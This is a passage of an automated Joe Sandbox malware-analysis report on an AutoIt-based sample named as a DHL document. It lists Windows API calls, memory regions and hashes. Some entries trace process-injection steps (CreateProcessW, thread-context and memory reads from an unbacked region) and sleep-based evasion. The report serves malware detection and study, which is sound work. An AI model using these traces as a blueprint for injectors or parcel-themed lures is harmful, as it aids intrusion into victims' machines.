                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID: H
                                                                                            • API String ID: 4237864984-2852464175

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00823A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008F1418,?,00822E7F,?,?,?,00000000), ref: 00823A78
                                                                                              • Part of subcall function 00823357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00823379
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0082356A
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0086318D
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008631CE
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00863210
                                                                                            • _wcslen.LIBCMT ref: 00863277
                                                                                            • _wcslen.LIBCMT ref: 00863286
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                            • API String ID: 98802146-2727554177

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00822B8E
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00822B9D
                                                                                            • LoadIconW.USER32(00000063), ref: 00822BB3
                                                                                            • LoadIconW.USER32(000000A4), ref: 00822BC5
                                                                                            • LoadIconW.USER32(000000A2), ref: 00822BD7
                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00822BEF
                                                                                            • RegisterClassExW.USER32(?), ref: 00822C40
                                                                                              • Part of subcall function 00822CD4: GetSysColorBrush.USER32(0000000F), ref: 00822D07
                                                                                              • Part of subcall function 00822CD4: RegisterClassExW.USER32(00000030), ref: 00822D31
                                                                                              • Part of subcall function 00822CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00822D42
                                                                                              • Part of subcall function 00822CD4: InitCommonControlsEx.COMCTL32(?), ref: 00822D5F
                                                                                              • Part of subcall function 00822CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00822D6F
                                                                                              • Part of subcall function 00822CD4: LoadIconW.USER32(000000A9), ref: 00822D85
                                                                                              • Part of subcall function 00822CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00822D94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                            • String ID: #$0$AutoIt v3
                                                                                            • API String ID: 423443420-4155596026

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0082316A,?,?), ref: 008231D8
                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,0082316A,?,?), ref: 00823204
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00823227
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0082316A,?,?), ref: 00823232
                                                                                            • CreatePopupMenu.USER32 ref: 00823246
                                                                                            • PostQuitMessage.USER32(00000000), ref: 00823267
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                            • String ID: TaskbarCreated
                                                                                            • API String ID: 129472671-2362178303
                                                                                            • Opcode ID: 320da1a549894a6b51c65c2bd70e9885d380a7f38ee5755a5e08d12a4d3f1ade
                                                                                            • Instruction ID: 581a51043ed5ae02d37b24a7bf741f76d267f2fe25209654549e9b6d06c7e0ba
                                                                                            • Opcode Fuzzy Hash: 320da1a549894a6b51c65c2bd70e9885d380a7f38ee5755a5e08d12a4d3f1ade
                                                                                            • Instruction Fuzzy Hash: 8D410431200228E7DF151B7CAC2DF793A69FB05345F540125F642D62A2DB6ADA80D7A6

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00B64341
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B64567
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileFreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 204039940-0
                                                                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                            • Instruction ID: 4da838a7cd33468fbe144b62abe022e865f138f3fb549f37337ca97885eab110
                                                                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                            • Instruction Fuzzy Hash: 7DA10674E00209EBDB14CFA4C995BEEBBB5FF48304F208599E205BB280DB799A41DB55

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00822C91
                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00822CB2
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00821CAD,?), ref: 00822CC6
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00821CAD,?), ref: 00822CCF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateShow
                                                                                            • String ID: AutoIt v3$edit
                                                                                            • API String ID: 1584632944-3779509399
                                                                                            • Opcode ID: 31a35f7c24a1f856a0a57736f137a8a71e1b5699767547a6640be651b2a84916
                                                                                            • Instruction ID: 70ad7c9bf7791a212160772969069439f8fa7917ff4165f6e324b7ac6281e038
                                                                                            • Opcode Fuzzy Hash: 31a35f7c24a1f856a0a57736f137a8a71e1b5699767547a6640be651b2a84916
                                                                                            • Instruction Fuzzy Hash: 86F0DA76540290BAEB311727AC0CEB72EBDF7C7F60B10005AF900A67A0C6691854DAB4

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00B63F30: Sleep.KERNELBASE(000001F4), ref: 00B63F41
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B64169
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileSleep
                                                                                            • String ID: WTL4V64ONXZZGWK34R
                                                                                            • API String ID: 2694422964-149578307
                                                                                            • Opcode ID: 10dfb706c1c42f36bffb97ea34da3edb2f312667f789c0da9729a4c36744578c
                                                                                            • Instruction ID: 980ec20bd484f2d877fd6f3a99f209322533c13974c915d2f96ecfe496bee7bd
                                                                                            • Opcode Fuzzy Hash: 10dfb706c1c42f36bffb97ea34da3edb2f312667f789c0da9729a4c36744578c
                                                                                            • Instruction Fuzzy Hash: 7D51A030D14288EAEF11DBA4C854BEFBBB9EF19300F104199E609BB2C0D7B91B44CB65

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892C05
                                                                                            • DeleteFileW.KERNEL32(?), ref: 00892C87
                                                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00892C9D
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892CAE
                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892CC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$Copy
                                                                                            • String ID:
                                                                                            • API String ID: 3226157194-0
                                                                                            • Opcode ID: a8d2df07e4487e535605f213189664b85d5fe200cd1003a0f595977fe22a2f05
                                                                                            • Instruction ID: 96a616efab4f18c419453c464a31fd4d3619e0c50f6550cd6e8d26158f91589c
                                                                                            • Opcode Fuzzy Hash: a8d2df07e4487e535605f213189664b85d5fe200cd1003a0f595977fe22a2f05
                                                                                            • Instruction Fuzzy Hash: 13B13F72D0012DABDF21EBA8CC85EDEB7BDFF49354F1440A6F509E6151EA309A448F61

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B40
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B61
                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: Control Panel\Mouse
                                                                                            • API String ID: 3677997916-824357125
                                                                                            • Opcode ID: 37f244bbddf17368a0d756e809f87ae40d544ee79b194411139e7fa122f3ac73
                                                                                            • Instruction ID: 82bbaf824d0c44d7d6c1a6dd89f0fe7d4407c154ca53852882964ef984317beb
                                                                                            • Opcode Fuzzy Hash: 37f244bbddf17368a0d756e809f87ae40d544ee79b194411139e7fa122f3ac73
                                                                                            • Instruction Fuzzy Hash: 01112AB5511218FFDB208FA5EC54AAFB7B8FF04754B104559B805D7110D2359E819B60

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00B636EB
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B63781
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B637A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                            • Instruction ID: a966eee52eccc7cfa26429c830c2a28d4774c1224868209d46af084eed3db90c
                                                                                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                            • Instruction Fuzzy Hash: 79621F70A14658DBEB24CFA4C851BDEB3B2EF58700F1091A9D10DEB390E7799E81CB59
                                                                                            Strings
                                                                                            • Variable must be of type 'Object'., xrefs: 008732B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                            • API String ID: 0-109567571
                                                                                            • Opcode ID: 1ae883e6f54a95546d425c79977737ed728ec6240f67d3e4c8e5f9cb461ca799
                                                                                            • Instruction ID: fc60c7d49ce8262b0658dea7d9a85a9e3573afa5a6184b3fcffd625a776f0a39
                                                                                            • Opcode Fuzzy Hash: 1ae883e6f54a95546d425c79977737ed728ec6240f67d3e4c8e5f9cb461ca799
                                                                                            • Instruction Fuzzy Hash: 1CC29B71A00228CFCB24CF58D884AADB7B1FF18314F248569E956EB395D335ED81CB96
                                                                                            APIs
                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008633A2
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00823A04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                            • String ID: Line:
                                                                                            • API String ID: 2289894680-1585850449
                                                                                            • Opcode ID: 6c618e580f963a93ed85174cc310a5fb07b1bcbed58557c19145f5d026289b8a
                                                                                            • Instruction ID: 596d2b3cdbf66a18156418108fb8acf0c4599adf0bcdb1f4a862f67da3bc995e
                                                                                            • Opcode Fuzzy Hash: 6c618e580f963a93ed85174cc310a5fb07b1bcbed58557c19145f5d026289b8a
                                                                                            • Instruction Fuzzy Hash: 4331B271508324ABC725EB24EC59FEBB7D8FB45714F00492AF599C2291EB789688C7C3
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00840668
                                                                                              • Part of subcall function 008432A4: RaiseException.KERNEL32(?,?,?,0084068A,?,008F1444,?,?,?,?,?,?,0084068A,00821129,008E8738,00821129), ref: 00843304
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00840685
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 89c2c25a8e391658a3dc1d412442f0db39a7bcfe5d251102664256ebc39ce415
                                                                                            • Instruction ID: 2596e75444e88dd7f38db77f9e7b11eb5795fdca16795e3ec50fb42e74ae3ea4
                                                                                            • Opcode Fuzzy Hash: 89c2c25a8e391658a3dc1d412442f0db39a7bcfe5d251102664256ebc39ce415
                                                                                            • Instruction Fuzzy Hash: 91F0C83490030DB78B00B6A8DC4AC9E776CFE50314B604531BA25D5592EF71DA15CDC2
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0089302F
                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00893044
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$FileNamePath
                                                                                            • String ID: aut
                                                                                            • API String ID: 3285503233-3010740371
                                                                                            • Opcode ID: a7f808704a4f461f9186809402f1a9b486abe6c1ba7008f496a8dfbccce67b50
                                                                                            • Instruction ID: 9e57274a449e183c4b5b34e61760ed134b106ed9a64024cf272629444f85d975
                                                                                            • Opcode Fuzzy Hash: a7f808704a4f461f9186809402f1a9b486abe6c1ba7008f496a8dfbccce67b50
                                                                                            • Instruction Fuzzy Hash: 05D05E7290032867DA20A7A5AC0EFCB3B6CEB05750F0002A1B755E2091EAB49984CBE0
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008A82F5
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 008A82FC
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 008A84DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 146820519-0
                                                                                            • Opcode ID: 2bbf1106a60fc50c3e8953bfa07ce8a67ce887faee746a57466b691a956bde6a
                                                                                            • Instruction ID: 370975c3c3b097465509be80467b37fa8f265f33c6e9a47a8b3ecc70b1a28454
                                                                                            • Opcode Fuzzy Hash: 2bbf1106a60fc50c3e8953bfa07ce8a67ce887faee746a57466b691a956bde6a
                                                                                            • Instruction Fuzzy Hash: D0125971A08341DFD714DF28C484B6ABBE5FF89318F04895DE899CB252DB31E945CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 30af50f63f0156c66f54b38539ebd5f6c78546fc1a5fef9d2305a4b9da15e632
                                                                                            • Instruction ID: 4532417b34716ec50abc5e9ba0af8c81436edd1678fc9b845319abdd399f2c6e
                                                                                            • Opcode Fuzzy Hash: 30af50f63f0156c66f54b38539ebd5f6c78546fc1a5fef9d2305a4b9da15e632
                                                                                            • Instruction Fuzzy Hash: 8E51AE71D0061D9FCF119FA8C859EAE7BB8FF05326F140159E805EB292D7719E09CB62
                                                                                            APIs
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00821BF4
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00821BFC
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00821C07
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00821C12
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00821C1A
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00821C22
                                                                                              • Part of subcall function 00821B4A: RegisterWindowMessageW.USER32(00000004,?,008212C4), ref: 00821BA2
                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0082136A
                                                                                            • OleInitialize.OLE32 ref: 00821388
                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 008624AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1986988660-0
                                                                                            • Opcode ID: 781bbbf3a070bfd0550d82f3867d373aac9b8a125814bd2685e1acdd5385fee8
                                                                                            • Instruction ID: 64ebfe2b15f0e5166c936f46ab28bd41d0db486434c3a3624dcd607c2fb9c4f3
                                                                                            • Opcode Fuzzy Hash: 781bbbf3a070bfd0550d82f3867d373aac9b8a125814bd2685e1acdd5385fee8
                                                                                            • Instruction Fuzzy Hash: CD71CEB4911204CFCF84EFBAA94DA753AE1FBAC784754823AD11AC7361EB304448CF55
                                                                                            APIs
                                                                                              • Part of subcall function 00823923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00823A04
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0088C259
                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0088C261
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088C270
                                                                                            Memory Dump Source
